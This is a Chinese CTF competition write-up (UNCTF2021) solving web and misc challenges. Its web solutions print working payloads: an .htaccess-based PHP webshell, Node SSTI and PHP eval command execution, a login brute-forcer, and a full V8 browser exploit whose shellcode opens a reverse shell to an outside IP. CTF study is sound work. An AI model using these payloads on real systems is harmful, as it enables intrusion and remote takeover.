WEB
fuzz_md5
爆破找前6位为666666的md5的值,然后常规操作即可得到flag
import hashlib
import re
for a in range(1,1000000000):
b=hashlib.md5(str(a).encode("utf-8"))
c=(b.hexdigest().encode("utf-8"))
if c[0:6]==b'666666':
print(a)
#print(c)
babywrite
<?php
highlight_file(__FILE__);
$sandbox = md5($_SERVER['REMOTE_ADDR']);
if (!is_dir($sandbox)) {
mkdir($sandbox);
}
if (isset($_GET['filename']) && isset($_GET['content'])) {
$filename = $_GET['filename'];
$content = $_GET['content'];
if (preg_match_all("/ph|\.\.|\//i", $filename) || strlen($filename) > 10) {
die("No way!");
}
if (preg_match_all("/<\?|ph/", $content)) {
die("No way!");
}
$filename = $sandbox . "/" . $filename;
@file_put_contents($filename, $content);
echo $filename;
}
传.htaccess
?filename=.htaccess&content=AddType application/x-httpd-p\%0Ahp .png%0Ap\%0Ahp_value a\%0Auto_append_file "p\%0Ahp://filter/convert.b\%0Aase64-decode/resource=a.png"
传a.png
PD9waHAgZXZhbCgkX1BPU1Rbc2FwXSk7Pz4=
然后
nodejs_ssti
随便乱输个,报错,sodajs,找sodajs的ssti,构造一手(好吧偷的)
{{ " ".toString.constructor("return global.process.mainModule.constructor._load('child_process').execSync('ls').toString()")() }}
然后cat /flag即可
phpmysql
<?php
show_source(__FILE__);
echo("欢迎来到unctf2021,have fun"."<br>");
$db_host=$_POST['host'];
$db_user=$_POST['user'];
$db_pwd=$_POST['pwd'];
$db_port=$_POST['port'];
if($db_host==""){
die("数据库地址不能为空!");
}
if(is_numeric($db_host)){
echo("fakeflag is /flag"."<br>");
if(preg_match("/;|\||&/is",$db_user) || preg_match("/;|\||&/is",$db_pwd) || preg_match("/;|\||&/is",$db_port)){
die("嘉然今天吃什么");
}
system("mysql -h $db_host -u $db_user -p $db_pwd -P $db_port --enable-local-infile");
}
else{
echo("Maybe you can do someting else"."<br>");
if(!isset($db_user) || !isset($db_pwd)){
eval("echo new Exception(\"<script>alert('关注嘉然,顿顿解馋!!!');</script>\");");
}
else{
$db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
eval("echo new $db_user($db_pwd);");
}
}
注意到后面两个可控参数
$db_user = str_ireplace("SplFileObject", "UNCTF2021", $db_user);
eval("echo new $db_user($db_pwd);");
用异常报错执行rce,ctfshow上有对应知识点。
payload:
host=c&pwd=system("tac /fllllaaaaag")&user=exception
encrypt_login
题目说了
I can tell you my name is admin and my password is made by number only. This time, you can not to buster my password :)
密码纯数字,但是有js加密过,混淆又解不开,bp没法爆,这里贴上脚本
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
if __name__ == '__main__':
browser = webdriver.Chrome(executable_path=r"D:\Program Files\Google\Chrome\Application\chromedriver.exe")
browser.get("http://0578b386-07e3-45c0-8eee-97b1f3546d01.node1.hackingfor.fun/login.php")
try:
WebDriverWait(browser, 10).until(
EC.presence_of_element_located((By.XPATH, '//*[@id="submit"]'))
)
except Exception as e:
browser.quit()
exit(1)
browser.execute_script("document.querySelector('#username').value='admin'")
for password in range(999999):
# password=1234
browser.execute_script(
"document.querySelector('#password').value='%s';document.querySelector('#submit').click()" % (
str(password)))
网页照相馆
hint说注意user-agent,我放了个自己vps的xss平台地址上去让他访问,捕获到chrome版本还有系统,百度一下有这个版本的远程代码执行漏洞0day。打开viper新增一个监听载荷
将生成的c文件里的内容稍作修改替换原本漏洞的exp里的shellcode,变成
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [0x48,0x31,0xff,0x6a,0x09,0x58,0x99,0xb6,0x10,0x48,0x89,0xd6,0x4d,0x31,0xc9
,0x6a,0x22,0x41,0x5a,0xb2,0x07,0x0f,0x05,0x48,0x85,0xc0,0x78,0x51,0x6a,0x0a
,0x41,0x59,0x50,0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05
,0x48,0x85,0xc0,0x78,0x3b,0x48,0x97,0x48,0xb9,0x02,0x00,0x04,0x57,0x51,0x47
,0x55,0x3c,0x51,0x48,0x89,0xe6,0x6a,0x10,0x5a,0x6a,0x2a,0x58,0x0f,0x05,0x59
,0x48,0x85,0xc0,0x79,0x25,0x49,0xff,0xc9,0x74,0x18,0x57,0x6a,0x23,0x58,0x6a
,0x00,0x6a,0x05,0x48,0x89,0xe7,0x48,0x31,0xf6,0x0f,0x05,0x59,0x59,0x5f,0x48
,0x85,0xc0,0x79,0xc7,0x6a,0x3c,0x58,0x6a,0x01,0x5f,0x0f,0x05,0x5e,0x6a,0x7e
,0x5a,0x0f,0x05,0x48,0x85,0xc0,0x78,0xed,0xff,0xe6];
var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var main = wasmInstance.exports.main;
var bf = new ArrayBuffer(8);
var bfView = new DataView(bf);
function fLow(f) {
bfView.setFloat64(0, f, true);
return (bfView.getUint32(0, true));
}
function fHi(f) {
bfView.setFloat64(0, f, true);
return (bfView.getUint32(4, true))
}
function i2f(low, hi) {
bfView.setUint32(0, low, true);
bfView.setUint32(4, hi, true);
return bfView.getFloat64(0, true);
}
function f2big(f) {
bfView.setFloat64(0, f, true);
return bfView.getBigUint64(0, true);
}
function big2f(b) {
bfView.setBigUint64(0, b, true);
return bfView.getFloat64(0, true);
}
class LeakArrayBuffer extends ArrayBuffer {
constructor(size) {
super(size);
this.slot = 0xb33f;
}
}
function foo(a) {
let x = -1;
if (a) x = 0xFFFFFFFF;
var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));
arr.shift();
let local_arr = Array(2);
local_arr[0] = 5.1;//4014666666666666
let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8
arr[0] = 0x1122;
return [arr, local_arr, buff];
}
for (var i = 0; i < 0x10000; ++i)
foo(false);
gc(); gc();
[corrput_arr, rwarr, corrupt_buff] = foo(true);
corrput_arr[12] = 0x22444;
delete corrput_arr;
function setbackingStore(hi, low) {
rwarr[4] = i2f(fLow(rwarr[4]), hi);
rwarr[5] = i2f(low, fHi(rwarr[5]));
}
function leakObjLow(o) {
corrupt_buff.slot = o;
return (fLow(rwarr[9]) - 1);
}
let corrupt_view = new DataView(corrupt_buff);
let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);
let idx0Addr = corrupt_buffer_ptr_low - 0x10;
let baseAddr = (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;
let delta = baseAddr + 0x1c - idx0Addr;
if ((delta % 8) == 0) {
let baseIdx = delta / 8;
this.base = fLow(rwarr[baseIdx]);
} else {
let baseIdx = ((delta - (delta % 8)) / 8);
this.base = fHi(rwarr[baseIdx]);
}
let wasmInsAddr = leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr, this.base);
let code_entry = corrupt_view.getFloat64(13 * 8, true);
setbackingStore(fLow(code_entry), fHi(code_entry));
for (let i = 0; i < shellcode.length; i++) {
corrupt_view.setUint8(i, shellcode[i]);
}
main();
</script>
然后放到vps里,起一个服务
python3 -m http.server xxxx(端口号)
起好之后把vps:xxxx地址填进去让bot去照相,也就是访问,然后就可以成功上线
之后就可以拿flag了
MISC
1.简单日志审计
一串base64解密
2.电信诈骗
变异凯撒
#!/usr/bin/env python
# coding:utf-8
def b_kaisa(mstr):
j = 4
i = 0
lmstr = []
for i in range(len(mstr)):
m = ord(mstr[i]) # 将密文的第i个字母变为其ascii码值
m = m + j # ascii值+j
lmstr.append(m) # 将递进后的ascii值存入列表lmstr[]
i = i+1
j = j+1
return lmstr
if __name__ == '__main__':
m_str = 'qi]m^roVibdVbXUU`h' # 密文
lstr = []
lstr = b_kaisa(m_str)
for i in lstr:
print(chr(i),end='')
3.引大流咯,happy
非常无语的改高度,算一下十六进制值然后找到改一下就行了
4.倒立洗头
一开始没发现什么,strings看看,发现一串倒过来的base64,拿去解码得到
佛日:上俱故。遠大密隸怯除多皤孕耨爍梵地諳薩侄究缽老諳不想皤者滅罰輸缽阿侄滅梵夢侄不冥吉真梵沙缽度即缽隸怯明侄切侄知呐地南呼舍咒奢佛涅哆姪神密明哆逝室地恐冥呼怯佛喝哆伽都怯遮諳倒缽帝冥帝輸曰諳麼俱怖俱苦俱波
很无语的是这个是日 不是曰 改过来即可得到flag
5.LPL
图片文件用tweakpng打开,错误的crc值拿去转一下得到压缩包密码,EDGnb!!打开以后得到一个b站链接和一个截图,截图上面是时间,盲猜弹幕或者评论,然后在对应的世界找到评论,得到flag